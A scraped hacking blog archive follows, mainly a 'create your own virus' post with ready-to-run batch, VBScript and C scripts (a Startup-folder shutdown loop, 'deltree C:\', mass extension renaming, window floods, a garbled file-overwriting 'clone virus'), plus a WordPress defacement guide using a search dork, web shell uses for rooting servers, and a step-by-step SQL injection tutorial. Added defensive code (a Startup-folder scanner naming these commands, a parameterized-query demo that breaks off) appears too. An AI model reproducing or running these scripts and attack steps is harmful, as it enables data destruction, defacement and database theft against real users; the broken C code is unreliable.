Showing posts with label Hacking. Show all posts

Tuesday, November 18, 2014

Virus And Trojan Codes : Create Your Own

This section contains virus code. Some of these scripts may already be familiar to you, but they are still harmful as well as educational. The platforms in which these viruses are coded are listed below.
  • BATCH Programming.
  • C/C++
  • Python
  • Visual Basic.
The code here is for educational purposes. Please don’t use it to harm others. You can install a virtual machine on your system to experiment with these scripts.

1. SHUTDOWN VIRUS

Many of you know this trick, and I can’t call it a virus. Still, it is not a friendly one: it can harm your data if it is not saved.
  • Effect –> May harm your work and unsaved data.
  • Coding  Platform –> Batch Programming.
  • Working –> On execution, it shuts down your system immediately. If your data is not saved, your work can be lost, and it can sometimes be more destructive for normal users.
Type or paste the code into Notepad and save it with a “.bat” extension. Example  –>  ron.bat
**************************************************
@echo off
shutdown -s -t “30″
**************************************************
The “30″ here is the time, in seconds, after which the system shuts down. You can set any time you require. You can also add a comment with the “-c” switch after “30″ to show the user a message during the shutdown process.
Example  –>  shutdown -s -t “60″ -c “Windows Formatting starts…”

2. SHUTDOWN VIRUS {More Destructive}

This code is the same as above, but it shuts the system down every time it starts, so the system never finishes starting up.
  • Effect –>  Destructive and Irritating.
  • Coding platform  –> Batch Programming.
  • Working  –> Shuts the system down each time it starts, so the user is never able to log in properly. If the user boots the system again and again, this sometimes causes Windows failure or data loss.
Just type or copy the code into Notepad and save it with a “.bat” extension.
**************************************************
@echo off
shutdown -s -t “00″
**************************************************
Now go to the following location  –>  Start  –>  All Programs  –>  Startup. Right-click and open the folder, then copy the saved .bat file into that Startup folder.
CAUTION  –>  DON’T USE THIS ON YOUR SYSTEM, YOU WILL NEVER BE ABLE TO OPEN YOUR SYSTEM. THE ONLY WAY TO GET RID OF THIS VIRUS IS TO START YOUR SYSTEM IN SAFE MODE, GO TO THAT STARTUP FOLDER AND DELETE THAT “.bat” FILE.

3. MULTIPLY FOLDER VIRUS

  • Effect –> Not destructive, but can sometimes become very irritating and itchy.
  • Coding Platform –>  Batch Programming.
  • Working –>  This code creates multiple folders each time the system starts up and also opens those hundreds of folders. It is not destructive, but while executing it can eat up your system’s resources, resulting in slow performance, and can sometimes hang the system.
Just write or copy the code into Notepad and save it with a “.bat” extension.
**************************************************
@echo off
:RON
md folder1
md folder2
md folder3
md folder4
md folder5
start folder1
start folder2
start folder3
start folder4
start folder5
goto RON
**************************************************
Now go to START  –>  ALL PROGRAMS  –>  STARTUP FOLDER and copy the .bat file into that folder. The next time the system starts, multiple folders are created and opened automatically. You can give the folders any names you want.

4. NOTEPAD FLOOD

  • Effect –>  Not Destructive or harmless.
  • Coding Platform –>  Batch Programming.
  • Working –>  On execution, this .bat file opens and floods the screen with Notepad windows {actually it opens around 180 notepads}. This sometimes causes the PC to hang.
Type or copy the code into Notepad and save it with a “.bat” extension.
**************************************************
@echo off
:RON
start notepad
start notepad
start notepad
goto RON
**************************************************
In the above code you can write “start notepad” any number of times. Repeating this command more often increases the flooding and raises the chance of a system hang.

5. DEADLY WORDPAD VIRUS

  • Effect –>  Deadly and Destructive.
  • Coding Platform –>  Batch Programming.
  • Working –>  On execution, this code will delete every single piece of data from your hard drive. It will also wipe out Windows from the system.
Just copy the code or type it in WordPad and save it under any name with a “.bat” extension.
**************************************************
@echo off
deltree C:\
**************************************************
NOTE  –  PLEASE DON’T RUN THAT “.bat” FILE ON YOUR SYSTEM. IT CAN BE VERY HARMFUL. AND LEARN THIS CODE FOR EDUCATIONAL PURPOSES ONLY, NOT TO HARM OTHERS.

6. FILE EXTENSION CORRUPTING VIRUS

  • Effect –>  Affects file execution; irritating but not destructive. Will corrupt how files work.
  • Coding Platform –>  Batch Programming.
  • Working –>  On execution, this code affects how files open by corrupting their extensions. The renamed files are disabled and can no longer be executed or opened in their proper format.
Just type or copy the code into Notepad and save it under any name with a “.bat” extension.
*************************************************
@echo off
ren *.exe *.txt
ren *.jpeg *.txt
ren *.mp3 *.txt
ren *.doc *.com
ren *.jpg *.txt
**************************************************
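
A defensive counterpart to sections 1 to 6, as an added example that is not part of the original post: a Python triage script that scans a Startup folder (where sections 2 and 3 place the .bat file) for the batch commands shown above. The rule names, function names and sample files are constructed for illustration.

```python
import os
import re
import tempfile
from pathlib import Path

# Line-level rules for the batch commands shown in sections 1 to 6.
# Rule names are labels chosen for this example.
LINE_RULES = [
    ("forced shutdown or restart",
     re.compile(r"^\s*@?shutdown(?:\.exe)?\s.*?[-/][srp]\b", re.I)),
    ("recursive delete of a drive root",
     re.compile(r"^\s*@?(?:deltree\b|(?:rd|rmdir|del|erase)\b.*\s/s\b)"
                r".*\s[a-z]:\\?\s*$", re.I)),
    ("wildcard extension rename",
     re.compile(r"^\s*@?ren(?:ame)?\s+\*\.\w+\s+\*\.\w+", re.I)),
]
LOOP_FINDING = "unconditional loop that spawns windows or folders"
SPAWN = re.compile(r"^\s*@?(?:start|md|mkdir)\s+\S", re.I)
LABEL = re.compile(r"^\s*:(?!:)\s*(\S+)")         # ":RON" but not a "::" comment
GOTO = re.compile(r"^\s*goto\s+:?(\S+)", re.I)    # conditional "if ... goto" is ignored
SCRIPT_EXTENSIONS = {".bat", ".cmd"}


def triage_script(text):
    """Return the sorted list of findings for one batch script."""
    findings = set()
    lines = text.splitlines()
    labels = {}
    for idx, line in enumerate(lines):
        for name, pattern in LINE_RULES:
            if pattern.search(line):
                findings.add(name)
        label = LABEL.match(line)
        if label:
            labels.setdefault(label.group(1).lower(), idx)
        jump = GOTO.match(line)
        if jump:
            # A backward jump with no condition is an endless loop; it matters
            # when the loop body keeps creating folders or starting programs.
            start = labels.get(jump.group(1).lower())
            if start is not None and any(SPAWN.match(l) for l in lines[start:idx]):
                findings.add(LOOP_FINDING)
    return sorted(findings)


def scan_startup(folder):
    """Triage every .bat/.cmd file in one folder; report only files with findings."""
    report = {}
    for path in sorted(Path(folder).iterdir()):
        if path.is_file() and path.suffix.lower() in SCRIPT_EXTENSIONS:
            found = triage_script(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                report[path.name] = found
    return report


def startup_folders():
    """Per-user and all-users Startup folders on Windows (empty list elsewhere)."""
    tail = Path("Microsoft", "Windows", "Start Menu", "Programs", "Startup")
    roots = [os.environ.get("APPDATA"), os.environ.get("PROGRAMDATA")]
    return [Path(root) / tail for root in roots if root]


def demo():
    """Scan a throwaway folder of constructed sample files (never executed)."""
    samples = {
        "ron.bat": "@echo off\nshutdown -s -t 00\n",
        "folders.bat": "@echo off\n:RON\nmd folder1\nstart folder1\ngoto RON\n",
        "backup.bat": "@echo off\nxcopy C:\\work D:\\backup /e /y\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            Path(tmp, name).write_text(body, encoding="utf-8")
        return scan_startup(tmp)


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", "; ".join(findings))
    for folder in startup_folders():
        if folder.is_dir():
            print(folder, "->", scan_startup(folder))
```

The scan only reads files. A hit is a prompt to review the script, and a benign file such as the constructed backup.bat produces no finding.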

7. DANCING CAPSLOCK & NUMLOCK

  • Effect –>  Low, Irritating for normal user.
  • Coding Platform –>  VBscript
  • Working –>  On execution, it toggles both Caps Lock and Num Lock continuously, which becomes very irritating for a normal user. This type of code can be used for prank purposes.
Just type the code or copy it into Notepad and save it under any name with a “.vbs” extension.  Example  –>  “ron.vbs”
**************************************************
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
loop
**************************************************

8. NOTEPAD TSUNAMI VIRUS

  • Effect –>  Harmful and effective; causes a system crash easily.
  • Coding Platform –>  VBscript.
  • Working –>  On execution, it opens Notepad an unlimited number of times and automatically writes text into it. It looks very scary to normal users, as it leads to a system hang and crashes the system in a few minutes.
Just type the code or copy it into Notepad and save it under any name with a “.vbs” extension.
**************************************************
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.SendKeys “H”
WScript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “l”
WScript.Sleep 200
WshShell.SendKeys “o “
WScript.Sleep 200
WshShell.SendKeys ” “
WScript.Sleep 200
WshShell.SendKeys “u”
WScript.Sleep 200
Wshshell.Sendkeys “s”
Wscript.Sleep 200
WshShell.SendKeys “e”
WScript.Sleep 200
WshShell.SendKeys “r”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “.”
WScript.Sleep 200
WshShell.SendKeys “…”
WScript.Sleep 200
WshShell.SendKeys “{enter}”
WScript.Sleep 200
WshShell.SendKeys “You”
WScript.Sleep 200
WshShell.SendKeys ” Have”
WScript.Sleep 200
WshShell.SendKeys ” Been”
WScript.Sleep 200
WshShell.SendKeys ” Hacked!!!”
WScript.Sleep 200
WshShell.SendKeys ” Now”
WScript.Sleep 200
WshShell.SendKeys ” Just”
WScript.Sleep 200
WshShell.SendKeys ” Taste”
WScript.Sleep 200
WshShell.SendKeys ” What”
WScript.Sleep 200
WshShell.SendKeys ” Virus”
WScript.Sleep 200
WshShell.SendKeys ” can do with uuuuuuuuuuuuu….”
WScript.Sleep 200
WshShell.SendKeys ” {enter}”
WScript.Sleep 200
WshShell.SendKeys “hahahahaha…….”
WScript.Sleep 200
WshShell.Sendkeys ” Now just Look Dumb Head what i will do!!!!!!!”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “look”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “how”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 100
wshshell.sendkeys “i”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “crash”
wscript.sleep 200
wshshell.sendkeys ” uR”
wscript.sleep 200
wshshell.sendkeys “{enter}”
wscript.sleep 200
wshshell.sendkeys “system”
wscript.sleep 200
loop
**************************************************

9. POP-UP CD/DVD DRIVE VIRUS

  • Effect –>  Low, but very irritating. Not Harmless.
  • Coding Platform –>  VBscript.
  • Working –>  On execution, it continuously pops out your CD/DVD drive. It is very irritating and can be stopped only by shutting the system down. It is not harmless or destructive.
Just copy the code or type it into Notepad and save it under any name with a “.vbs” extension.
**************************************************
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
************************************************************

10. CLONE VIRUS

  • Effect –>  Harmful and very effective.
  • Coding Platform –>  C, Turbo C.
  • Working –>  On execution, this virus turns every file in the current directory into a copy of the virus. Remember to run it only inside a new folder that contains no important executables or ordinary files, because it will turn those into the virus as well.
***************************************************
FILE *Ron *vRon;
int owned = 0;
unsigned long x;
char buff[256];
struct ffblk ffblk;
clock_t st, end;
main()
{
st=clock();
clrscr();
owned=(find_first(“*.*”, &ffblk,0);
while(!done)
{
Ron=fopen(_arg[0], “rb”);
vhost=fopen(ffblk.ff_name, “rb+”);
if (vhost = =NULL)
goto next;
x = 89088;
printf(“infecting %s\n”, ffblk.ff_name);
while(x>2048)
{
fread(buff,256,1,Ron);
fwrite(buff,256,1,vRon);
x – = 2048;
}
fread(buff,x,1,Ron);
fwrite(buff,x,1,vRon);
a++;
next:      fcloseall();
owned = findnext(&ffblk);
}
end = clock()
printf(“Infected %d files in %f sec”, a, (end-st)/CLK_TCk);
return (0);
}
**************************************************


Monday, September 29, 2014

What Is the Difference: Viruses, Worms, Trojans and Bots?

Introduction

Viruses, worms, Trojans, and bots are all part of a class of software called malware. Malware or malicious code (malcode) is short for malicious software. It is code or software that is specifically designed to damage, disrupt, steal, or in general inflict some other “bad” or illegitimate action on data, hosts, or networks.
There are many different classes of malware that have varying ways of infecting systems and propagating themselves. Malware can infect systems by being bundled with other programs or attached as macros to files. Others are installed by exploiting a known vulnerability in an operating system (OS), network device, or other software, such as a hole in a browser that only requires users to visit a website to infect their computers. The vast majority, however, are installed by some action from a user, such as clicking an e-mail attachment or downloading a file from the Internet.
Some of the more commonly known types of malware are viruses, worms, Trojans, bots, back doors, spyware, and adware. Damage from malware varies from causing minor irritation (such as browser popup ads), to stealing confidential information or money, destroying data, and compromising and/or entirely disabling systems and networks.
Malware cannot damage the physical hardware of systems and network equipment, but it can damage the data and software residing on the equipment. Malware should also not be confused with defective software, which is intended for legitimate purposes but has errors or bugs.

Classes of Malicious Software

Two of the most common types of malware are viruses and worms. These types of programs are able to self-replicate and can spread copies of themselves, which might even be modified copies. To be classified as a virus or worm, malware must have the ability to propagate. The difference is that a worm operates more or less independently of other files, whereas a virus depends on a host program to spread itself. These and other classes of malicious software are described below.

Viruses

A computer virus is a type of malware that propagates by inserting a copy of itself into and becoming part of another program. It spreads from one computer to another, leaving infections as it travels. Viruses can range in severity from causing mildly annoying effects to damaging data or software and causing denial-of-service (DoS) conditions. Almost all viruses are attached to an executable file, which means the virus may exist on a system but will not be active or able to spread until a user runs or opens the malicious host file or program. When the host code is executed, the viral code is executed as well. Normally, the host program keeps functioning after it is infected by the virus. However, some viruses overwrite other programs with copies of themselves, which destroys the host program altogether. Viruses spread when the software or document they are attached to is transferred from one computer to another using the network, a disk, file sharing, or infected e-mail attachments.

Worms

Computer worms are similar to viruses in that they replicate functional copies of themselves and can cause the same type of damage. In contrast to viruses, which require the spreading of an infected host file, worms are standalone software and do not require a host program or human help to propagate. To spread, worms either exploit a vulnerability on the target system or use some kind of social engineering to trick users into executing them. A worm enters a computer through a vulnerability in the system and takes advantage of file-transport or information-transport features on the system, allowing it to travel unaided.

Trojans

A Trojan is another type of malware named after the wooden horse the Greeks used to infiltrate Troy. It is a harmful piece of software that looks legitimate. Users are typically tricked into loading and executing it on their systems. After it is activated, it can achieve any number of attacks on the host, from irritating the user (popping up windows or changing desktops) to damaging the host (deleting files, stealing data, or activating and spreading other malware, such as viruses). Trojans are also known to create back doors to give malicious users access to the system.
Unlike viruses and worms, Trojans do not reproduce by infecting other files nor do they self-replicate. Trojans must spread through user interaction such as opening an e-mail attachment or downloading and running a file from the Internet.

Bots

"Bot" is derived from the word "robot" and is an automated process that interacts with other network services. Bots often automate tasks and provide information or services that would otherwise be conducted by a human being. A typical use of bots is to gather information (such as web crawlers), or interact automatically with instant messaging (IM), Internet Relay Chat (IRC), or other web interfaces. They may also be used to interact dynamically with websites.
Bots can be used for either good or malicious intent. A malicious bot is self-propagating malware designed to infect a host and connect back to a central server or servers that act as a command and control (C&C) center for an entire network of compromised devices, or "botnet." With a botnet, attackers can launch broad-based, "remote-control," flood-type attacks against their target(s). In addition to the worm-like ability to self-propagate, bots can include the ability to log keystrokes, gather passwords, capture and analyze packets, gather financial information, launch DoS attacks, relay spam, and open back doors on the infected host. Bots have all the advantages of worms, but are generally much more versatile in their infection vector, and are often modified within hours of publication of a new exploit. They have been known to exploit back doors opened by worms and viruses, which allows them to access networks that have good perimeter control. Bots rarely announce their presence with high scan rates, which damage network infrastructure; instead they infect networks in a way that escapes immediate notice.

Best Practices for Combating Viruses, Worms, Trojans and Bots

The first steps to protecting your computer are to ensure that your OS is up to date. This means regularly applying the most recent patches and fixes recommended by the OS vendor. Secondly, you should have antivirus software installed on your system and download updates frequently to ensure that your software has the latest fixes for new viruses, worms, Trojans, and bots. Additionally, you want to make sure that your antivirus program can scan e-mail and files as they are downloaded from the Internet. This will help prevent malicious programs from reaching your computer. You may also want to consider installing a firewall.

Additional Definitions and References


Exploit

An exploit is a piece of software, a command, or a methodology that attacks a particular security vulnerability. Exploits are not always malicious in intent—they are sometimes used only as a way of demonstrating that a vulnerability exists. However, they are a common component of malware.

Back Door

A back door is an undocumented way of accessing a system, bypassing the normal authentication mechanisms. Some back doors are placed in the software by the original programmer and others are placed on systems through a system compromise, such as a virus or worm. Usually, attackers use back doors for easier and continued access to a system after it has been compromised.

WordPress Remote File Upload Vulnerability with Asset Manager Hack Web sites

In WordPress we can upload our deface page using the Remote File Upload Vulnerability with Asset Manager. Asset Manager is a plugin that allows you to upload your files. Just follow these simple steps to hack the WordPress website.

1. Open google and search inurl:Editor/assetmanager/assetmanager.asp
2. Now open any result; what you find will look like the snapshot below.
3. Just click on browse and upload your deface page.


What is SHELL and How to use it ?

After getting admin access to a website, an attacker uploads his own control panel, which is called a shell. It helps the attacker maintain access for a long time. There are many types of shells, like DDOSE shell, symlink shell etc.

Using a shell, an attacker can destroy the whole database, leak the database of the website, and root the server. (Only a Linux server can be rooted; a Windows server can't be rooted because there is no ROOT.) After rooting, he can destroy the whole server. Suppose one server hosts 500 websites: if the attacker gets admin access to a single site and roots that server, all 500 sites can be destroyed!

USES  OF  SHELL


1. Using shell you can Destroy the INDEX page of the website
2. You can host your files in the server.
3. You can root the server

Now if you want to destroy the index page of the website, find the “INDEX” page in the list and replace its code with your own deface page. Using the browse option you can host your own file on the server. You can create your own shell and add your own tools to it; for that you need to know PHP.

Tuesday, September 23, 2014

How to become Professional Hacker


I'm not a professional hacker, but I'm not a noob either; I'm a learner like all of you. I am posting this article for people who want to become hackers in a short time without hard work.

Seven things you must know to become Hacker
  • Right Definition & Meaning of Hacker.
  • You must have Hacker Attitude & Confidence. 
  • Programming & Networking, (The Main thing beginner must know).
  • Learn Networking, Linux, Start use Backtrack/Linux.
  • Start using Linux, leave Windows. (I use Kali Linux)
  • Create Penetration testing lab and try to Hack it.
  • Never Give-up in Hacking - (Always remember there is always a way).
  • Stop Requesting Hackers to teach Hacking or "Hack for me".
Right Definition & Meaning of Hacker
You know, beginners, lamers and noobs think hacking means breaking into a Facebook account: they just learn phishing, key-logging, sniffing and a few small tricks and techniques to steal passwords. But seriously, that isn't hacking, that's stealing. Let's learn the real meaning of hacker.

Hacker : A hacker is one who searches for vulnerabilities and flaws (weak points of a web application or software), exploits them with different techniques, and hacks or reports them. Hackers have only five purposes: Learn, Earn, Protest, Publicity, & Challenge. Simply put, a hacker is awesome.

You must have an Hacker Attitude & Confidence
A hacker must have the attitude to break anything with their knowledge, talent and experience. I have seen many people say "I'll learn all programming languages to become a hacker", but the fact is they give up and start believing "I don't need to learn programming, I can hack directly via exploits and small techniques!", which is simply impossible. I accept that learning programming is not easy, but it isn't hard either. You must have confidence and the attitude to get something done under any conditions. Think like a hacker: try to understand how stuff works, think differently from everyone else, and be a quiet and simply awesome guy with the ability to do something. Believe in what you see and feel, be a tech lover, just program and keep calm. Never GIVE UP. Try to learn all types of computer technology: start with the basics and go step by step! Feel like a hacker, and make contacts with hackers and crackers.
Stop requesting hackers to teach you hacking. This is a very bad way for learners to talk to hackers; the hacker immediately understands that you're a lamer and a noob, and after that he doesn't like to talk with you.

Learn by yourself or Join Hacking Institutes :
  • CEH     :  Certified Ethical Hacker.
  • CHFI    :  Computer Hacking Forensics Investigation.
  • CCNA   :  Cisco Certified Networking Associate.
  • CISSP  :  Certified Information System Security Professional.
  • CCSN   : Certified Cyber Security Ninja. 
Learn Programming
The main problem of all learners and beginners is that they don't want to learn programming. It's hard, but once you have stepped in, never look back, and always remember that "the beginning part is always hard!" Nothing is impossible. Go step by step in the programming field; don't start with the hard parts.
Hacking is possible only when you're good at programming. If you're a champ in programming and networking, then hacking is a piece of cake for you. Yes, it will take a fairly long time, but it's really worth it. Programming is the solution to all the problems that learners face in hacking, coding and learning. Programming is the source, the base and the main point of a computer application or web application.

Questions which are always asked by noobs to other hackers:
1) Can I learn Hacking without Knowing Programming ?
2) How can I learn Programming ?
3) What Should I learn to become Hacker ?


Can I learn Hacking without Knowing Programming ? 
Simply, you can't. If you don't know programming then you can't hack anything. Yes, you can learn simple tricks and some basic attacks, but if you want to become a professional hacker or security researcher then you'll have to become a champ in programming and networking. Guys, programming isn't too hard; we just need to concentrate and practice, practice & practice. If you understand the programming and coding of web apps and software, then you'll understand the weak points of the app, you'll get to know how it works, and you can Create, Explore, Hack, Learn and Earn.
Programming is the base of hacking; without programming no one can learn hacking. I mean the professional and best hacking methods like Vulnerability Hunting, Exploitation, Reverse Engineering, SQLi, XSS & Advance XSS methods etc.
How can I learn Programming ?
There are many ways to learn programming languages. If you are passionate about hacking and programming and you are a computer geek, then you can do it all by yourself: you can use Google, e-books and websites that teach programming languages online, or you can learn in a group of friends or join classes.
What Should I learn to become Hacker ?
Well, this is the main point of our tutorial. So what should I learn? First of all, be passionate about programming and hacking. Trust in yourself and have patience.

There are two fields in Hacking :

1. Web-Application Hacking
2. Software Cracking/Hacking

So, first of all decide in which field you want to become the best. If you ask me, I'd suggest web application hacking and programming first; web programming isn't too hard, and afterwards you'll be able to understand software programming languages. Below is the step-by-step language guide and the compulsory programming languages for hackers.

Web Application Hacking & Programming
As you know, web applications are coded in different languages and methods using advanced programming techniques, and if you learn all types of web programming and coding then you'll be able to hack them and find the weak points of a web app.

Important Programming languages for Hackers
  • HTML, JavaScript, & CSS (DHTML)
  • PHP/ASP & SQL (Most Recommended - Server Side Scripting)
  • Ajax, jQuery, & JSON - (Must know little bit)
  • XML, DHTML.
  • Networking - (TCP/IP, HTTP, SMTP, etc) Most recommended.
  • Moving to advance stuffs like - (Python, C, Perl, and Ruby)
HTML is one of the most famous and all-time useful web programming languages; it is strongly recommended that you learn HTML to develop websites and content, including static and dynamic generators. JavaScript and CSS are also useful for hackers to discover XSS flaws and bypassing techniques.

PHP/ASP is strongly recommended because these are server-side scripting languages, used for programming dynamic web apps. Now SQL: as you know, SQL injection is the technique of injecting attacks into the DB, which can leak a website's sensitive data and also lead to defacement. XML is also recommended: data transmission, SOAP technology etc.

AJAX, jQuery and JSON are lightweight fat-client programming languages; they are not highly recommended, but you must know 50% of them.

Networking is also one of the most recommended things you must learn, because without knowing its flow, methods, logic and encoding/decoding you won't understand how everything works. So the most important things you must know are TCP/IP, SSL, HTTP, SMTP, proxies and other protocols.
Unfortunately even I have not moved on to advanced stuff like Python and Perl for writing exploits, so I have no experience or knowledge there. I'm still on programming, but I'll definitely post in the future about advanced scripting and writing exploits.
Software Cracking/Hacking & Programming
Software cracking, hacking and programming are also very useful in the computer hacking and cracking field: #Reverse Engineering, #Network, Adapter, Wifi Cracking & Hacking, #Software Cracking, #Virus, #Trojan, #Malware and other methods are used to hack #Software and #Secret Service Information.

What you must know ?
  • C Programming
  • C++ 
  • Python
  • UNIX/Linux
  • VB & .Net
  • Assembly Language (Most Important for Cracking & Hacking)
- Without Learning Programming & Networking you cannot Hack anything.




 
Source: Hackw0rm

Thursday, July 31, 2014

Mine Bitcoins with Raspberry Pi

Jump on the cryptocurrency bandwagon and mine some of your own Bitcoins – or other currency – with a spare Raspberry Pi


The concept of cryptocurrencies has come about in recent years as a sort of reaction to the way standard currencies are controlled. Cryptocurrencies such as Bitcoin are decentralised and not controlled by any one entity. In the past couple of years, Bitcoin has taken off to become a very valuable commodity, with whole Bitcoins becoming worth hundreds of pounds. While you can trade your standard currency for a Bitcoin, you can also mine them with a working computer.

The concept of mining basically means that you’re increasing the security of the Bitcoin system by logging transactions properly; users who donate processing power to this endeavour get paid for it in Bitcoins. This is where we come in, turning your Raspberry Pi into a Bitcoin mine.




Create your own Raspberry Pi Bitcoin miner

What you’ll need


Cpuminer
Bitcoin pool

Step-by-step


Step 01 Install dependencies

In this tutorial we’re going to be using cpuminer to mine for Bitcoins; this needs to be compiled from source though, so we have to install some dependencies first to make sure it works. Do this with:
$ sudo apt-get install gcc gcc-4.5 g++ g++-4.5 libstdc++6-4.5-dev libpcre3-dev libcurl3-dev make less

Step 02 Download locations

In order to make the building we’ll be doing soon a little bit easier, it’s best to create a directory for our files now. Still in the terminal, use:
mkdir bitcoind

After you’ve done that, move to the new directory with
cd bitcoind

Step 03 Get cpuminer

Visit the SourceForge link for cpuminer and download the latest version of the source from there to this new directory. It will be the latest version with no OS attached to the title. At the time of writing this is pooler-cpuminer-2.3.3.tar.gz.

Step 04 Extract the files

If you’re in the desktop you can easily extract the files from the file manager. Otherwise go back to the terminal you’ve been working in and unpack it with:
$ tar -zxvf pooler-cpuminer-2.3.3.tar.gz


Follow up by moving into the new cpuminer folder with cd.

Step 05 Build cpuminer

To build cpuminer we’ll be using two very standard compiling commands: ./configure and make. Both may take a while, with the make command likely to take the longest time. If you’ve followed the preceding steps properly, compiling should not be an issue for you.

Step 06 Join a pool

Mining solo is generally considered a futile effort if you want to actually make Bitcoin out of the process. Joining a pool is the best way to do this and be involved with the community at the same time. Sign up to get a username, password and URL.

Step 07 Start mining

With your worker details secure, go back to your Raspberry Pi and cd to the cpuminer folder again. To begin with cpu mining, enter the following command:
$ ./minerd --url [pool address] --userpass [username]:[password]

Cpuminer will then show your hashrate as it goes, which will probably be a touch slow at this stage.

Step 08 Increase mining speed

If you want to try and get a few more hashes per second from your Pi, you can always overclock it. In the terminal, open raspi-config and find the overclock option. You can increase it to whatever speed you wish but be aware that overclocking may seriously reduce your Pi’s lifespan.

Step 09 Future prospects

You’re unlikely to make much out of a Raspberry Pi this way; if you want to make a serious amount of Bitcoins you’ll need to increase your hashrate. You can expand your operation by attaching USB Bitcoin miners to the Raspberry Pi and powering it up exponentially.

Thursday, July 24, 2014

Hacking Websites Using SQL Injection Manually


Sql Injection - Hacking Websites


In this post we will hack a website and obtain its data using SQL injection attack. We will not use any tools. This is one of the few tuts on this blog for which you don't need Kali Linux. You can easily carry it out from Windows machine on any normal browser. If you need to get a big picture of what a SQL injection attack actually does, take a look at this tutorial on Basics Of SQL Injection.










Finding A Vulnerable Website


The first step is obviously finding a vulnerable website. There are a lot of ways to do so. The most common method of searching is by using dorks.

Dorks


A dork is a query entered into a search engine (Google) that attempts to find websites containing the text given in the dork itself. Basically, it helps you find websites with a specific string in their URL which you know is a sign of vulnerability.

A more specific definition could be "Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site." (from 1337mir)


Using Dorks


What a dork basically does is use Google's "inurl" command to return websites which have a specific set of vulnerable words in their URL. For that, we need to know which words in the URL make a website potentially vulnerable to a SQL injection attack. Many websites offer a comprehensive list of Google dorks. For example, the l33tmir website has a list of hundreds of Google dorks. However, creativity is your best tool when it comes to finding vulnerable sites, and after practicing with some Google dorks, you will be able to create your own. A few dorks have been listed below. What you have to do is paste them into the Google search bar and Google will return potentially vulnerable sites. NOTE: Don't mind the root@kali:~# behind the code. I have implemented this on all the code on my blog, and the majority of it is really on Kali Linux so it makes sense there but not here.

inurl:"products.php?prodID="

inurl:buy.php?category=

What you have to notice here is the structure of the commands. The inurl operator instructs Google to look at the URLs in its search index and return the ones which contain a specific string. Inside the inverted commas is the specific URL fragment which we would expect to see in a vulnerable website. All the vulnerable sites will surely have a .php in their URL, since it is an indicator that the website uses a SQL database here. After the question mark you will have a something= clause. What lies after the = will be our code that is known to cause malfunctioning of databases and carrying out of a SQL injection attack.
After you have used the dork, you have a list of potentially vulnerable sites. Most of them, though, may not be vulnerable (i.e. not in the way you want them to be; they might still have some vulnerabilities you don't know about yet). The second step is finding the actually vulnerable sites from a list of possible ones.

Testing sites for vulnerabilities


Now let's assume we used the first dork, i.e. products.php?prodID=. We then came across a site www.site.com/products.php?prodID=25. Now we have to check if that website is vulnerable or not. This is pretty simple. All you have to do is insert an apostrophe (') at the end of the URL instead of 25. The URL would look somewhat like this: www.site.com/products.php?prodID='

If you are lucky, then the site would be vulnerable. If it is, then some kind of error would show up, containing words like "Not found", "Table", "Database", "Row", "Column", "Sql", "MySQL" or anything related to a database. In some cases, there would be no error, but there would be some berserk/unexpected behavior on the page, like a few components not showing up properly, etc.











A typical error message

But right now you only know that the site is vulnerable. You still have to find which columns/rows are vulnerable.

Finding number of columns/rows



Now we need to find the number of columns in the table. For this, we will use the trial and error method, and keep executing statements, incrementing the number of columns till we get an error message.

www.site.com/products.php?prodID=25+order+by+1

Effectively, we added order by 1 to the end of the original URL. If there is at least one column in the table, then the page will continue to work all right. If not, then an error will be displayed. You can keep increasing the number of columns till you get an error. Let's assume you get an error for

www.site.com/products.php?prodID=25+order+by+6

This means that the page had 5 columns, and the database couldn't handle the query when you asked for the 6th one. So now you know two things:



  • The site is vulnerable to SQL injection

  • It has 5 columns

Now you need to know which of the columns is vulnerable.

Finding Vulnerable columns



Now let's assume we are working on our hypothetical site www.site.com which has 5 columns. We now need to find out which of those columns are vulnerable. Vulnerable columns allow us to submit commands and queries to the SQL database through the URL. To do this, enter the following into the URL:

www.site.com/products.php?prodID=25+union+select+1,2,3,4,5

In some cases you might need to put a - in front of the 25. The page will now load properly, except for a number showing up somewhere. This is the vulnerable column. Note it down.

Let's say the page refreshes and displays a 2 on the page, thus 2 being the vulnerable column for us to inject into.


Now we know which column is vulnerable. Next part is obtaining the SQL version, since the remaining tutorial will vary depending on which version of SQL is being used.
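Why the apostrophe, order by and union select probes above behave as described, and how a parameterized query stops them, shown as an added example that is not part of the original post. It uses Python's built-in sqlite3 as a stand-in for the site's PHP/MySQL code; the table, its sample row and the function names are constructed for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the page's products table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE products (id INTEGER, name TEXT, price REAL)")
    db.execute("INSERT INTO products VALUES (25, 'kettle', 19.5)")
    return db

def lookup_vulnerable(db, prod_id):
    # Vulnerable pattern: the URL parameter is pasted into the SQL text, so the
    # database parses whatever follows the number as part of the statement.
    sql = "SELECT id, name, price FROM products WHERE id = " + prod_id
    return db.execute(sql).fetchall()

def lookup_safe(db, prod_id, strict=True):
    # Hardened: reject anything that is not a plain integer, and bind the value
    # as a parameter so it is only ever compared as data, never parsed as SQL.
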